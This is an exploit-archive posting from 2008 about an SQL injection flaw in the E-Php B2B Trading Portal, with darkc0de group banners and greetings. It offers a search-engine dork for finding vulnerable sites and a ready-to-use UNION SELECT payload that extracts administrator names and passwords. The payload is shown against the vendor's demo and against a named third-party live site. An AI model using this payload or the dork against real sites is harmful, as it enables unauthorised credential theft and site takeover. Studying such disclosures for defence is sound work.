Home / exploits ephptrading-sql.txt
Posted on 19 September 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # # --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear # # --- Eliminator and to all members of darkc0de and ljuska.org# # ################################################################ # # Author: baltazar and sinner_01 # # Home : www.darkc0de.com & ljuska.org # # Email : b4ltazar@gmail.com, sinn3r01@gmail.com # # Share the c0de! # ################################################################ # # App Name: E-Php B2B Trading Portal # # App Home: http://www.ephpscripts.com/index.php # # E-Php B2B Trading Marketplace Script is an excellent solution to start your own global marketplace site like alibaba.com, ec21.com etc. # Script has been developed by a team to experienced professionals with the motive to provide a stable bug free foundation to your trading # portal site # # Dork: inurl:/listings.php?browse= intext:Powered by ephpscripts # # POC: /listings.php?browse=sell&cid=-14+union+all+select+1,concat_ws(char(58),es_admin_name,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin-- # DEMO: #http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-14+union+all+select+1,concat_ws(char(58),es_admin_name,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin-- # # Example: #http://www.banglamart.com/listings.php?browse=sell&cid=-14+union+all+select+1,concat_ws(char(58),es_admin_name,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin-- # # Vuln Discovered 09/10/2008
